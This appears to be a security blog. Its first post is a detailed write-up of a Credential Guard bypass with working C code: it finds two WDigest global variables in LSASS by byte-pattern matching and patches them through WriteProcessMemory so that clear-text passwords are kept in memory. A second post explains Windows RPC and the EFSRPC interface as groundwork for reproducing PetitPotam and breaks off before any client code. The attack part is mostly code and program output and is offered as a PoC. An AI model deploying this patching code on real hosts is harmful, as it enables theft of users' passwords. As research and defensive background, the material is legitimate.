Revisiting a Credential Guard Bypass

You probably have already heard or read about this clever Credential Guard bypass which consists in simply patching two global variables in LSASS. All the implementations I have found rely on hardcoded offsets, so I wondered how difficult it would be to retrieve these values at run-time instead.

Background

As a reminder, when (Windows Defender) Credential Guard is enabled on a Windows host, there are two lsass.exe processes, the usual one and one running inside a Hyper-V Virtual Machine. Accessing the juicy stuff in this isolated lsass.exe process therefore means breaking the hypervisor, which is not an easy task.

Source: https://docs.microsoft.com/en-us/windows/security/identity-protection/credential-guard/credential-guard-how-it-works

However, in August 2020, an article titled Bypassing Credential Guard was posted on Team Hydra’s blog. In this post, @N4k3dTurtl3 discussed a very clever and simple trick. In short, the well-known WDigest module (wdigest.dll), which is loaded by LSASS, has two interesting global variables: g_IsCredGuardEnabled and g_fParameter_UseLogonCredential. Their names are rather self-explanatory: the first one holds the state of Credential Guard within the module (is it enabled or not?), while the second one determines whether clear-text passwords should be stored in memory. By flipping these two values, you can trick the WDigest module into acting as if Credential Guard were not enabled and as if the system were configured to keep clear-text passwords in memory. Once these two values have been properly patched within the LSASS process, the latter will keep a copy of each user’s password the next time an authentication occurs. In other words, you won’t be able to access previously stored credentials, but you will be able to extract clear-text passwords afterwards.

The implementation of this technique is rather simple. You first determine the offsets of the two global variables by loading wdigest.dll in a disassembler or a debugger along with the public symbols (the offsets may vary depending on the file version). After that, you just have to find the module’s base address in the target process to calculate their absolute addresses. Once their location is known, the values can be patched and/or restored in the target lsass.exe process.
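
For reference, once a handle to lsass.exe and the base address of wdigest.dll are known, the patch itself boils down to two WriteProcessMemory calls. The following is only a rough sketch of that approach; the offsets are hypothetical placeholders for a given wdigest.dll build, not values taken from the actual tools.

// Hypothetical offsets for a specific wdigest.dll build (placeholders only)
#define OFFSET_USE_LOGON_CREDENTIAL  0x00036108
#define OFFSET_IS_CRED_GUARD_ENABLED 0x00035c18

BOOL PatchWdigest(HANDLE hLsass, PBYTE pWdigestBase)
{
    DWORD dwOne = 1, dwZero = 0;
    SIZE_T BytesWritten;

    // g_fParameter_UseLogonCredential = 1 -> keep clear-text passwords in memory
    if (!WriteProcessMemory(hLsass, pWdigestBase + OFFSET_USE_LOGON_CREDENTIAL, &dwOne, sizeof(dwOne), &BytesWritten))
        return FALSE;

    // g_IsCredGuardEnabled = 0 -> pretend Credential Guard is not enabled
    return WriteProcessMemory(hLsass, pWdigestBase + OFFSET_IS_CRED_GUARD_ENABLED, &dwZero, sizeof(dwZero), &BytesWritten);
}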

The original PoC is available here. I found two other projects implementing it: WdToggle (a BOF module for Cobalt Strike) and EDRSandblast. All these implementations rely on hardcoded offsets, but is there a more elegant way? Is it possible to find them at run-time?

We need a plan

If we want to find the offsets of these two variables, we first have to understand how and where they are stored. So let’s fire up Ghidra, import the file C:\Windows\System32\wdigest.dll, load the public symbols, and analyze the whole thing.

Loading the symbols allows us to quickly find these two values from the Symbol Tree. What we learn there is that g_IsCredGuardEnabled and g_fParameter_UseLogonCredential are two 4-byte values (i.e. double words / DWORD values) that are stored in the R/W .data section, which is nothing surprising.

If we take a look at what surrounds these two values, we can see that there is just a bunch of uninitialized data. And even once the module is loaded, there is most probably no particular marker that we will be able to leverage for identifying their location. It is like searching for a needle in a haystack, with the added challenge of not being able to distinguish the needle from the rest of the hay.

So, searching directly in the .data section is definitely not the way to go. There is a better approach: rather than searching for these values, we can search for cross-references! The reason these global variables even exist in the first place is that they are used somewhere in the code. Therefore, if we can find these references, we can also find the variables.

Ghidra conveniently lists all the cross-references in the “Listing” view, so let’s see if there is anything interesting.

Two referencing functions immediately stand out - SpAcceptCredentials and SpInitialize - as they are common to both variables. If we can limit the search to a single place, the whole process will certainly be a bit easier. On top of that, looking at these two functions in the symbol tree, we can see that SpInitialize is exported by the DLL, which means that we can easily get its address with a call to GetProcAddress() for instance.

We can go to the “Decompile” view and have a glimpse at how these variables are used within the SpInitialize function.

The RegQueryValueExW call is interesting because the x86 opcode of a function call is rather easy to identify. From there, we could then work backwards and see how the fifth argument is handled. This is a potential avenue to consider so let’s keep it in mind.

That would be a way to identify the g_fParameter_UseLogonCredential variable but what about g_IsCredGuardEnabled? The code from the “Decompile” view is not that easy to interpret as is, so we will have to go a bit deeper.

g_IsCredGuardEnabled = (uint)((*(byte *)(param_2 + 1) & 0x20) != 0);

Here, I found the assembly code to be less confusing.

mov r15,param_2
; ...
test byte ptr [r15 + 0x4],0x20
cmovnz eax,esi
mov dword ptr [g_IsCredGuardEnabled],eax

First, the second parameter of the function call - param_2 - is loaded into the R15 register. Then, the byte located at offset 0x04 from this pointer is dereferenced and tested (bitwise AND) against the mask 0x20.

The function SpInitialize is documented here. The documentation tells us that the second parameter is a pointer to a SECPKG_PARAMETERS structure.

NTSTATUS Spinitializefn(
  [in] ULONG_PTR PackageId,
  [in] PSECPKG_PARAMETERS Parameters,
  [in] PLSA_SECPKG_FUNCTION_TABLE FunctionTable
)

The structure SECPKG_PARAMETERS is documented here. The attribute located at the offset 0x04 in the structure (c.f. byte ptr [R15 + 0x4]) is MachineState.

typedef struct _SECPKG_PARAMETERS {
  ULONG          Version;
  ULONG          MachineState;
  ULONG          SetupMode;
  PSID           DomainSid;
  UNICODE_STRING DomainName;
  UNICODE_STRING DnsDomainName;
  GUID           DomainGuid;
} SECPKG_PARAMETERS, *PSECPKG_PARAMETERS, SECPKG_EVENT_DOMAIN_CHANGE, *PSECPKG_EVENT_DOMAIN_CHANGE;

The documentation provides a list of possible flags for the MachineState attribute, but it does not tell us which flag corresponds to the value 0x20. However, it does tell us that the SECPKG_PARAMETERS structure is defined in the header file ntsecpkg.h. Therefore, we should find it in the Windows SDK, along with the SECPKG_STATE_* flags.

// Values for MachineState

#define SECPKG_STATE_ENCRYPTION_PERMITTED               0x01
#define SECPKG_STATE_STRONG_ENCRYPTION_PERMITTED        0x02
#define SECPKG_STATE_DOMAIN_CONTROLLER                  0x04
#define SECPKG_STATE_WORKSTATION                        0x08
#define SECPKG_STATE_STANDALONE                         0x10
#define SECPKG_STATE_CRED_ISOLATION_ENABLED             0x20
#define SECPKG_STATE_RESERVED_1                   0x80000000

Here we go! The value 0x20 corresponds to the flag SECPKG_STATE_CRED_ISOLATION_ENABLED, which makes quite a lot of sense in our case. In the end, the previous line of C code could simply be rewritten as follows.

g_IsCredGuardEnabled = (param_2->MachineState & SECPKG_STATE_CRED_ISOLATION_ENABLED) != 0;

Note: I could have also helped Ghidra a bit by defining this structure and editing the prototype of the SpInitialize function to achieve a similar result.

That’s all very well, but do we have clear opcode patterns to search for? The answer is “not really”… Prior to the RegQueryValueExW call, a reference to g_fParameter_UseLogonCredential is loaded into RAX; that’s a rather common operation, and we cannot rely on the compiler using the same register every time. After the call to RegQueryValueExW, g_fParameter_UseLogonCredential is set to 0 in an if statement. Again, this is a generic operation, so it is not good enough for establishing a pattern. As for g_IsCredGuardEnabled, there is an interesting set of instructions, but we cannot rely on the compiler producing the same code every time here either.

; Before the call to RegQueryValueExW
; 180003180 48 8d 05 2d 30 03 00
lea     rax,[g_fParameter_UseLogonCredential]
; ...
; 18000318e 48 89 44 24 20
mov     qword ptr [rsp + local_b8],rax=>g_fParameter_UseLogonCredential
; After the call to RegQueryValueExW
; 1800031b1 44 89 25 fc 2f 03 00
mov     dword ptr [g_fParameter_UseLogonCredential],r12d
; Test on param_2->MachineState
; 18000299b 41 f6 47 04 20
test    byte ptr [r15 + 0x4],0x20
; 1800029a0 0f 45 c6
cmovnz  eax,esi
; 1800029a3 89 05 5f 32 03 00
mov     dword ptr [g_IsCredGuardEnabled],eax

We are (almost) back to square one. However, we had a second option - SpAcceptCredentials - so let’s try our luck with this function. As it turns out, the two variables seem to be used in a single if statement as we can see in the “Decompile” view.

The original assembly consists of a CMP instruction, followed by a MOV instruction.

; 180001839 39 1d 75 49 03 00
cmp     dword ptr [g_fParameter_UseLogonCredential],ebx
; 18000183f 8b 05 c3 43 03 00
mov     eax,dword ptr [g_IsCredGuardEnabled]
; 180001845 0f 85 9c 77 00 00
jnz     LAB_180008fe7

Since the public symbols were imported and the PE file was analyzed, Ghidra conveniently displays the references to the variables rather than addresses or offsets. To better understand how this works though, we should have a look at the “raw” assembly code.

cmp    dword ptr [rip + 0x34975],ebx  ; 39 1d 75 49 03 00
mov    eax,dword ptr [rip + 0x343c3]  ; 8b 05 c3 43 03 00
jnz    0x77ae                         ; 0f 85 9c 77 00 00

On the first line, the first byte - 39 - is the opcode of the CMP instruction that compares a 16 or 32-bit register against a value in another register or a memory location. Then, 1d is the ModR/M byte, which encodes the source register (EBX in this case) and the RIP-relative addressing mode. Finally, 75 49 03 00 is the little-endian representation of the offset of g_fParameter_UseLogonCredential relative to RIP (rip+0x34975). The second line works pretty much the same way, although it is a MOV instruction.

The third line represents a conditional jump, which won’t help us establish a reliable pattern. If we consider only the first two lines though, we can already build a potential pattern: 39 ?? ?? ?? ?? 00 8b ?? ?? ?? ?? 00. We just make the reasonable assumption that the offsets won’t exceed the value 0x00ffffff.

Needless to say, this is not great, but there is still room for improvement, so let’s test it first and see if it is at least good enough as a starting point. For that matter, Ghidra has a convenient “Search Memory” tool that can be used to search for byte patterns.

To my surprise, this simple pattern yielded only one result in the entire file. Of course, this is not completely conclusive because the PE file also contains uninitialized data that could match the pattern once the module is loaded. To address this issue, though, we can simply limit the search to the .text section, since it is not subject to modifications at run-time.

There is still one last problem. I tested the pattern against a single file. What if this pattern is not generic enough or what if it yields false positives in other versions of wdigest.dll? If only there was an easy way to get my hands on multiple versions of the file to verify that…

And here comes The Windows Binaries Index (or “Winbindex”). This is a nicely designed web application that aggregates all the metadata from update packages released by Microsoft. It also provides a link whenever the file is available for download. Kudos to @m417z for this tool, this is a game changer. From the home page, I can simply search for wdigest.dll and virtually get access to any version of the file.

Apart from the version installed in my VM (10.0.19041.388), I tested the above pattern against the oldest (10.0.10240.18638 - Windows 10 1507) and the most recent version I could find (10.0.22000.434 - Windows 11 21H2) and it worked amazingly well in both cases.

It looks like a plan is starting to emerge. In the end, the overall idea is pretty simple. We have to read the DLL, locate the .text section and simply search for our pattern in the raw data. From the matching buffer, we will then be able to extract the variable offsets and adjust them (more on that later).

Practical implementation

Let me quickly recap what we are trying to achieve. We want to read and patch two global variables within the wdigest.dll module. Because of their nature, these two variables are located in the R/W .data section, but they are not easy to locate as they are just simple boolean flags. However, we identified some code in the .text section that references them. So, the idea is to first extract their offsets from the assembly code, and then get the base address of the target module to find their exact location in the lsass.exe process.

Searching for our code pattern

We want to find a portion of the code that matches the pattern 39 ?? ?? ?? ?? 00 8b ?? ?? ?? ?? 00. To do so, we have to first locate the .text section of the wdigest.dll PE file. There are two ways to do this. We can either load the module in the memory of our process or read the file from disk. I decided to go for the second option (for no particular reason).

Locating the .text section is easy. The first bytes of the PE file contain the DOS header, which gives us the offset to the NT headers (e_lfanew). In the NT headers, we find the FileHeader member, which gives us the number of sections (NumberOfSections).

typedef struct _IMAGE_DOS_HEADER {      // DOS .EXE header
    WORD   e_magic;                     // Magic number
    // ...
    LONG   e_lfanew;                    // File address of new exe header
} IMAGE_DOS_HEADER, *PIMAGE_DOS_HEADER;

typedef struct _IMAGE_NT_HEADERS64 {
    DWORD Signature;
    IMAGE_FILE_HEADER FileHeader;
    IMAGE_OPTIONAL_HEADER64 OptionalHeader;
} IMAGE_NT_HEADERS64, *PIMAGE_NT_HEADERS64;

typedef IMAGE_NT_HEADERS64 IMAGE_NT_HEADERS;

typedef struct _IMAGE_FILE_HEADER {
    WORD    Machine;
    WORD    NumberOfSections;
    // ...
} IMAGE_FILE_HEADER, *PIMAGE_FILE_HEADER;

We can then simply iterate the section headers that are located after the NT headers, until we find the one with the name .text.

typedef struct _IMAGE_SECTION_HEADER {
    BYTE    Name[IMAGE_SIZEOF_SHORT_NAME];
    // ...
    DWORD   SizeOfRawData;
    DWORD   PointerToRawData;
    // ...
} IMAGE_SECTION_HEADER, *PIMAGE_SECTION_HEADER;
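
To illustrate, here is a minimal sketch of how the .text section header could be located by walking these structures directly in the file. It assumes hFile was obtained beforehand with CreateFileW (as hinted in the next snippet), and all error handling is omitted.

IMAGE_DOS_HEADER DosHeader;
IMAGE_NT_HEADERS NtHeaders;
IMAGE_SECTION_HEADER SectionHeader;
DWORD dwBytesRead, dwSectionHeaderOffset;
BOOL bTextSectionFound = FALSE;

// Read the DOS header located at the very beginning of the file
SetFilePointer(hFile, 0, NULL, FILE_BEGIN);
ReadFile(hFile, &DosHeader, sizeof(DosHeader), &dwBytesRead, NULL);

// e_lfanew gives the file offset of the NT headers
SetFilePointer(hFile, DosHeader.e_lfanew, NULL, FILE_BEGIN);
ReadFile(hFile, &NtHeaders, sizeof(NtHeaders), &dwBytesRead, NULL);

// The section headers immediately follow the optional header
dwSectionHeaderOffset = DosHeader.e_lfanew
    + FIELD_OFFSET(IMAGE_NT_HEADERS, OptionalHeader)
    + NtHeaders.FileHeader.SizeOfOptionalHeader;
SetFilePointer(hFile, dwSectionHeaderOffset, NULL, FILE_BEGIN);

for (WORD i = 0; i < NtHeaders.FileHeader.NumberOfSections; i++) {
    ReadFile(hFile, &SectionHeader, sizeof(SectionHeader), &dwBytesRead, NULL);
    if (strncmp((char*)SectionHeader.Name, ".text", IMAGE_SIZEOF_SHORT_NAME) == 0) {
        bTextSectionFound = TRUE;
        break;
    }
}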

Once we have identified the section header corresponding to the .text section, we know its size and its offset in the file. With that knowledge, we can invoke SetFilePointer to move the file pointer to PointerToRawData bytes from the beginning of the file, and then read SizeOfRawData bytes into a pre-allocated buffer.

// hFile = CreateFileW(L"C:\\Windows\\System32\\wdigest.dll", ...);
PBYTE pTextSection = (PBYTE)LocalAlloc(LPTR, SectionHeader.SizeOfRawData);
DWORD dwBytesRead;
SetFilePointer(hFile, SectionHeader.PointerToRawData, NULL, FILE_BEGIN);
// lpNumberOfBytesRead must not be NULL for a synchronous read
ReadFile(hFile, pTextSection, SectionHeader.SizeOfRawData, &dwBytesRead, NULL);

Then, it is just a matter of reading the buffer, which I did with a simple loop. When I find the byte 0x39, which is the first byte of the pattern, I simply check the following 11 bytes to see if they also match.

// Pattern: 39 ?? ?? ?? ?? 00 8b ?? ?? ?? ?? 00
j = 0;
while (j + 11 < SectionHeader.SizeOfRawData) {
  if (pTextSection[j] == 0x39) {
    if ((pTextSection[j + 5] == 0x00) && (pTextSection[j + 6] == 0x8b) && (pTextSection[j + 11] == 0x00)) {
      wprintf(L"Match at offset: 0x%04x\r\n", SectionHeader.VirtualAddress + j);
    }
  }
  j++;
}

However, I do not stop at the first occurrence. As a simple safeguard, I check the entire section and count the number of times the pattern is matched. If this count is 0, obviously this means that the search failed. But if the count is greater than 1, I also consider that it failed. I want to make sure that the pattern matches only once.
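
A rough sketch of this safeguard, reusing the variable names from the previous snippets, could look like this.

// Count the matches and remember the offset of the last one
DWORD dwMatchCount = 0, dwCodeOffset = 0;
for (DWORD j = 0; j + 11 < SectionHeader.SizeOfRawData; j++) {
  if ((pTextSection[j] == 0x39) && (pTextSection[j + 5] == 0x00) && (pTextSection[j + 6] == 0x8b) && (pTextSection[j + 11] == 0x00)) {
    dwCodeOffset = SectionHeader.VirtualAddress + j;
    dwMatchCount++;
  }
}

// The search is considered successful only if the pattern was matched exactly once
if (dwMatchCount != 1) {
  wprintf(L"[-] Expected exactly one match, found %d\r\n", dwMatchCount);
  return 1;
}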

Just for testing purposes and out of curiosity, I also tried several variants of the pattern to sort of see how efficient it was. Surprisingly, the count dropped very quickly with only two occurrences for the variant #2.

Variant   Pattern                               Occurrences
1         39 .. .. .. .. 00 .. .. .. .. .. ..   98
2         39 .. .. .. .. 00 8b .. .. .. .. ..   2
3         39 .. .. .. .. 00 8b .. .. .. .. 00   1

If we execute the program, here is what we get so far. We have exactly one match at the offset 0x1839.

C:\Temp>WDigestCredGuardPatch.exe
Exactly one match found, good to go!
Matched code at 0x00001839: 39 1d 75 49 03 00 8b 05 c3 43 03 00

For good measure, we can verify if the offset 0x1839 is correct by going back to Ghidra. And indeed, the code we are interested in starts at 0x180001839.

Note: the value 0x180000000 is the default base address of the PE. This value can be found in NtHeaders.OptionalHeader.ImageBase.

Extracting the variable offsets

Below are the bytes that we were able to extract from the .text section, and their equivalent x86_64 disassembly.

cmp    dword ptr [rip + 0x34975], ebx   ; 39 1D   75 49 03 00
mov    eax, dword ptr [rip + 0x343c3]   ; 8B 05   C3 43 03 00

And here is the thing I intentionally glossed over in the first part. Since I am not used to reading assembly code, these two lines initially puzzled me. I was expecting to find the addresses of the two variables directly in the code, but instead, I found only RIP-relative offsets.

I learned that the x86_64 architecture indeed uses RIP-relative addressing to reference data. As explained in this post, the main advantage of using this kind of addressing is that it produces Position Independent Code (PIC).

The RIP-relative address of g_fParameter_UseLogonCredential is rip+0x34975. We found the code at the address 0x00001839, so the absolute offset of g_fParameter_UseLogonCredential should be 0x00001839 + 0x34975 = 0x361ae, right?

But the offset is actually 0x361b4. Oh, wait… When an instruction is executed, RIP actually already points to the next one. This means that we must add 6, the length of the CMP instruction, to this value: 0x00001839 + 6 + 0x34975 = 0x361b4. Here we go!

We apply the same method to the second variable - g_IsCredGuardEnabled - and we find: 0x00001839 + 6 + 6 + 0x343c3 = 0x35c08.

We identified the 12 bytes of code and we know their offset in the PE, so the implementation is pretty easy. The RIP-relative offsets are stored using the little endian representation, so we can directly copy the four bytes into DWORD temporary variables if we want to interpret them as unsigned long values.

DWORD dwUseLogonCredentialOffset, dwIsCredGuardEnabledOffset;

RtlMoveMemory(&dwUseLogonCredentialOffset, &Code[2], sizeof(dwUseLogonCredentialOffset));
RtlMoveMemory(&dwIsCredGuardEnabledOffset, &Code[8], sizeof(dwIsCredGuardEnabledOffset));
dwUseLogonCredentialOffset += 6 + dwCodeOffset;
dwIsCredGuardEnabledOffset += 6 + 6 + dwCodeOffset;

wprintf(L"Offset of g_fParameter_UseLogonCredential: 0x%08x\r\n", dwUseLogonCredentialOffset);
wprintf(L"Offset of g_IsCredGuardEnabled: 0x%08x\r\n", dwIsCredGuardEnabledOffset);

And here is the result.

C:\Temp>WDigestCredGuardPatch.exe
Exactly one match found, good to go!
Matched code at 0x00001839: 39 1d 75 49 03 00 8b 05 c3 43 03 00
Offset of g_fParameter_UseLogonCredential: 0x000361b4
Offset of g_IsCredGuardEnabled: 0x00035c08

Finding the base address

Now that we know the absolute offsets of the two global variables, we must determine their absolute address in the target process lsass.exe. Of course, this part was already implemented in the original PoC, using the following method:

  1. Open the lsass.exe process with PROCESS_ALL_ACCESS.
  2. List the loaded modules with EnumProcessModules.
  3. For each module, call GetModuleFileNameExA to determine whether it is wdigest.dll.
  4. If so, call GetModuleInformation to get its base address.
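
As an illustration, a bare-bones version of that lookup could look like the following sketch (hypothetical helper function, no error handling, case-insensitive match done with StrStrIA from shlwapi).

#include <windows.h>
#include <psapi.h>
#include <shlwapi.h>
#pragma comment(lib, "Shlwapi.lib")

// Hypothetical helper: returns the base address of wdigest.dll within the target process
PVOID GetWdigestBaseAddress(DWORD dwLsassPid)
{
    HANDLE hProcess;
    HMODULE hModules[1024];
    DWORD dwSize;
    CHAR szModulePath[MAX_PATH];
    MODULEINFO ModuleInfo;
    PVOID pBaseAddress = NULL;

    if (!(hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwLsassPid)))
        return NULL;

    if (EnumProcessModules(hProcess, hModules, sizeof(hModules), &dwSize)) {
        for (DWORD i = 0; i < dwSize / sizeof(HMODULE); i++) {
            if (GetModuleFileNameExA(hProcess, hModules[i], szModulePath, MAX_PATH) && StrStrIA(szModulePath, "wdigest.dll")) {
                if (GetModuleInformation(hProcess, hModules[i], &ModuleInfo, sizeof(ModuleInfo)))
                    pBaseAddress = ModuleInfo.lpBaseOfDll;
                break;
            }
        }
    }

    CloseHandle(hProcess);
    return pBaseAddress;
}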

Ideally, we would like to interact with LSASS as little as possible but, since we need to patch it anyway, this method works perfectly fine. I just wanted to take this opportunity to present another approach and discuss some aspects of Windows DLLs.

The key thing is that the base address of a module is determined when it is first loaded. Therefore, any subsequent process loading this module will use the exact same base address. In our case, this means that if we load wdigest.dll in our current process, we will be able to determine its base address without even having to touch LSASS. (I will admit that this sounds a bit dumb because the whole purpose is to eventually patch it.)

Loading a DLL is commonly done through the Windows API LoadLibraryW or LoadLibraryExW. The documentation states that they return “a handle to the module”, but I would say that it is a bit misleading. These functions actually return a HMODULE, which is not a typical kernel object HANDLE. In reality, the HMODULE value is… the base address of the module.

In conclusion, we can get the base address of wdigest.dll in the lsass.exe process simply by running the following code in our own context. One could argue that loading wdigest.dll might look suspicious, but it is nothing compared to patching LSASS anyway so this is not really my concern here.

HMODULE hModule;
if ((hModule = LoadLibraryW(L"wdigest.dll")))
{
  wprintf(L"Base address of wdigest.dll: 0x%016p\r\n", hModule);
  FreeLibrary(hModule);
}
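
Combining this base address with the offsets extracted earlier is then a simple addition. Here is a rough sketch, assuming the variable names from the previous snippets and computing the addresses before the call to FreeLibrary.

// hModule, dwUseLogonCredentialOffset and dwIsCredGuardEnabledOffset come from the previous snippets
ULONG_PTR pUseLogonCredential = (ULONG_PTR)hModule + dwUseLogonCredentialOffset;
ULONG_PTR pIsCredGuardEnabled = (ULONG_PTR)hModule + dwIsCredGuardEnabledOffset;

wprintf(L"Address of g_fParameter_UseLogonCredential: 0x%016llx\r\n", (ULONGLONG)pUseLogonCredential);
wprintf(L"Address of g_IsCredGuardEnabled: 0x%016llx\r\n", (ULONGLONG)pIsCredGuardEnabled);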

After adding this to my own PoC and calculating the addresses, here is what I get. Not bad!

C:\Temp>WDigestCredGuardPatch.exe
Exactly one match found, good to go!
Matched code at 0x00001839: 39 1d 75 49 03 00 8b 05 c3 43 03 00
Offset of g_fParameter_UseLogonCredential: 0x000361b4
Offset of g_IsCredGuardEnabled: 0x00035c08
Base address of wdigest.dll: 0x00007FFEE32B0000
Address of g_fParameter_UseLogonCredential: 0x00007ffee32e61b4
Address of g_IsCredGuardEnabled: 0x00007ffee32e5c08

We can confirm that the base address of wdigest.dll is the same by inspecting the memory of the lsass.exe process using Process Hacker for instance.

Conclusion

The first thing I want to say is thank you to @N4k3dTurtl3 for the initial post on this subject. I really liked the simplicity and efficiency of this trick. It always amazes me how this kind of hack can defeat really advanced protections such as Credential Guard.

Now, the question is, as a pentester (or a red teamer), should you use the technique I described in this post? The idea of not having to rely on hardcoded offsets and therefore running code that is version-independent is attractive. However, it might also be a bit riskier as pattern matching is not an exact science. To address this, I implemented a safeguard which consists in ensuring that the pattern is matched exactly once. This leaves us with only one potential false positive: the pattern could be matched exactly once on a random portion of code, which seems rather unlikely. The only risk I see is that Microsoft could slightly change the implementation so that my pattern just no longer works.

As for defenders, enabling Credential Guard should not prevent you from enabling LSA Protection as well. We all know that it can be completely bypassed, but this operation has a cost for an attacker. It requires running code in the kernel or using a sophisticated userland bypass, both of which create avenues for detection. As rightly said by @N4k3dTurtl3:

The goal is to increase the cost in time, effort, and tooling […] thus making your network less appealing as a target and increasing opportunities for detection and response.

Lastly, this was a cool little challenge, not too difficult, and as always I learned a few things along the way, the perfect recipe. Oh, and if you have read this far, you can find my PoC here.

From RpcView to PetitPotam

In the previous post we saw how to set up a Windows 10 machine in order to manually analyze Windows RPC with RpcView. In this post, we will see how the information provided by this tool can be used to create a basic RPC client application in C/C++. Then, we will see how we can reproduce the trick used in the PetitPotam tool.

The Theory

Before diving into the main subject, I need to discuss some basic concepts first to make sure we are all on the same page. First, as I said in the previous post, DCE/RPC is one of the many IPC (InterProcess Communication) mechanisms used in Windows. It allows a process A - the RPC client - to invoke procedures or functions that are implemented and executed in a process B - the RPC server.

That being said, this raises some questions that I will quickly cover in the next paragraphs.

  • How does an RPC client distinguish an RPC server from another?
  • How does an RPC client know which procedures/functions are exposed by the RPC server?
  • How does an RPC client invoke the remote procedures/functions?

Interface Definition

I assume you are familiar with the concept of interface in the context of Object Oriented Programming (OOP). An interface is a sort of contract, consisting of a set of methods, that an Object must fulfill by implementing those said methods. With RPC, that’s exactly the same idea. The difference is that the methods are implemented in another process, and can even be accessed from a remote machine on the network.

If a client wants to consume an interface, they first need to know what is written in the interface’s contract. In other words, they need the following information:

  • The GUID of the interface: how to identify the interface?
  • A protocol sequence: how to interact with this interface?
  • An Opnum (i.e. a procedure ID): which procedure to call?
  • A set of parameters: what information does the server need in order to execute the procedure?

For that matter, the developer of an RPC server will usually release an IDL (Interface Definition Language) file. The purpose of this file is to provide the developer of an RPC client with all the information they need in order to consume this interface, without having to worry about its actual implementation on server-side. In a way, IDL for RPC interfaces is very similar to what WSDL/WADL are for web services and applications.

As an example, PetitPotam leverages the Encrypting File System Remote Protocol (EFSRPC), which is based on the EFSR interface. You can find the complete IDL file corresponding to this interface here, but I also included an extract below.

import "ms-dtyp.idl";

[
    uuid(c681d488-d850-11d0-8c52-00c04fd90f7e),
    version(1.0),
]

interface efsrpc
{
    typedef [context_handle] void * PEXIMPORT_CONTEXT_HANDLE;
    typedef pipe unsigned char EFS_EXIM_PIPE;
    
    /* [snip] */

    long EfsRpcOpenFileRaw(
        [in]            handle_t                   binding_h,
        [out]           PEXIMPORT_CONTEXT_HANDLE * hContext,
        [in, string]    wchar_t                  * FileName,
        [in]            long                       Flags
    );

    long EfsRpcReadFileRaw(
        [in]            PEXIMPORT_CONTEXT_HANDLE   hContext,
        [out]           EFS_EXIM_PIPE            * EfsOutPipe
    );

    /* [snip] */
}

In this file, we can find the UUID (Universal Unique Identifier) of the interface, some type definitions, and the prototype of the exposed procedures or functions. That’s all the information a client needs in order to invoke remote procedures.

Protocol Sequence

Knowing which procedures/functions are exposed by an interface isn’t actually sufficient to interact with it. The client also needs to know how to access this interface. The way a client talks to an RPC server is called the protocol sequence. Depending on the implementation of the RPC server, a given interface might even be accessible through multiple protocol sequences.

Generally speaking, Windows supports three protocols (source):

RPC Protocol   Description
NCACN          Network Computing Architecture connection-oriented protocol
NCADG          Network Computing Architecture datagram protocol
NCALRPC        Network Computing Architecture local remote procedure call

RPC protocols used for remote connections (NCACN and NCADG) through a network can be supported by many “transport” protocols. The most common transport protocol is obviously TCP/IP, but other more exotic protocols can also be used, such as IPX/SPX or AppleTalk DSP. The complete list of supported transport protocols is available here.

Although 14 Protocol Sequences are supported, only 4 of them are commonly used:

Protocol Sequence   Description
ncacn_ip_tcp        Connection-oriented Transmission Control Protocol/Internet Protocol (TCP/IP)
ncacn_np            Connection-oriented named pipes
ncacn_http          Connection-oriented TCP/IP using Microsoft Internet Information Server as HTTP proxy
ncalrpc             Local procedure call

For instance, when using ncacn_np, the DCE/RPC requests are encapsulated inside SMB packets and sent to a remote named pipe. On the other hand, when using ncacn_ip_tcp, DCE/RPC requests are directly sent over TCP. I made the following diagram to illustrate these 4 protocol sequences.

Binding Handles

Once you know the definition of the interface and which protocol to use, you have (almost) all the information you need to connect or bind to the remote or local RPC server.

This concept is quite similar to how kernel object handles work. For example, when you want to write some data to a file, you first call CreateFile to open it. In return, the kernel gives you a handle that you can then use to write your data by passing the handle to WriteFile. Similarly, with RPC, you connect to an RPC server by creating a binding handle, that you can then use to invoke procedures or functions on the interface you requested access to. It’s as simple as that.

Note: this analogy is limited though as the RPC client initiates its own binding handle. The RPC server is then responsible for ensuring that the client has the appropriate privileges to invoke a given procedure.

Unlike with kernel object handles though, there are multiple types of binding handles: automatic, implicit and explicit. This type determines how much work a client has to do in order to initialize and/or manage the binding handle. In this post, I will cover only one example, but I made another diagram to illustrate these different cases.

For instance, if an RPC server requires the use of explicit binding handles, as a client, you have to write some code to create it first and then you have to explicitly pass it as an argument for each procedure call. On the other hand, if the server requires the use of automatic binding handles, you can just call a remote procedure, and the RPC runtime will take care of everything else, such as connecting to the server, passing the binding handle and closing it when it’s done.

The “PetitPotam” case

The EFSRPC protocol is widely documented here but, for the sake of this blog post, we will just pretend that this documentation does not exist. So, we will first see how we can collect all the information we need with RpcView. Then, we will see how we can use this information to write a simple RPC client application. Finally, we will use this RPC client application to experiment a bit and see what we can do with the exposed RPC procedures.

Exploring the EFSRPC Interface with RpcView

Let’s imagine we are randomly browsing the output of RpcView, searching for interesting procedure names. Since we downloaded the PDB files for all the DLLs that are in C:\Windows\System32 and we configured the appropriate path in the options (see part 1), this should feel pretty much like playing a video game. :nerd_face:

When clicking on the LSASS process (1), we can see that it contains many RPC interfaces. So we go through them one by one and we stop on the one with the GUID c681d488-d850-11d0-8c52-00c04fd90f7e (2) because it exposes several procedures that seem to perform file operations (according to their name) (3).

File operations initiated by low-privileged users and performed by privileged processes (such as services running as SYSTEM) are always interesting to investigate because they might lead to local privilege escalation (or even remote code execution in some cases). On top of that, they are relatively easy to find and visualize, using Process Monitor for instance.

In this example, RpcView provides other very useful information. It shows that the interface we selected is exposed through a named pipe: \pipe\lsass (4). It also shows us the name of the process, the path of the executable on disk and the user it runs as (5). Finally, we know that this interface is part of the “LSA extension for EFS”, which is implemented in C:\Windows\System32\efslsaext.dll (6).

Collecting all the Required Information

As I explained at the beginning of this post, in order to interact with an RPC server, a client needs some information: the ID of the interface, the protocol sequence to use and, last but not least, the definition of the interface itself. As we have seen in the previous part, RpcView already gives us the ID of the interface and the protocol sequence, but what about the interface’s definition?

  • ID of the interface: c681d488-d850-11d0-8c52-00c04fd90f7e
  • Protocol sequence: ncacn_np
  • Name of the endpoint: \pipe\lsass

And here comes what probably is the most powerful feature of RpcView. If you select the interface you are interested in, and right-click on it, you will see an option that allows you to “decompile” it. The “decompiled” IDL code will then appear in the “Decompilation” window right above it.

Although this feature is very powerful, it is not 100% reliable. So, don’t expect it to always produce a usable file, straight out of the box. Besides, some information such as the name of the structures is inevitably lost in the process. In the next parts, I will cover some common errors you may encounter when using the generated IDL file.

Creating an RPC Client for the EFSRPC Interface in C/C++

Now that we have all the information we need, we can create an RPC client in C/C++ and start playing around with the interface.

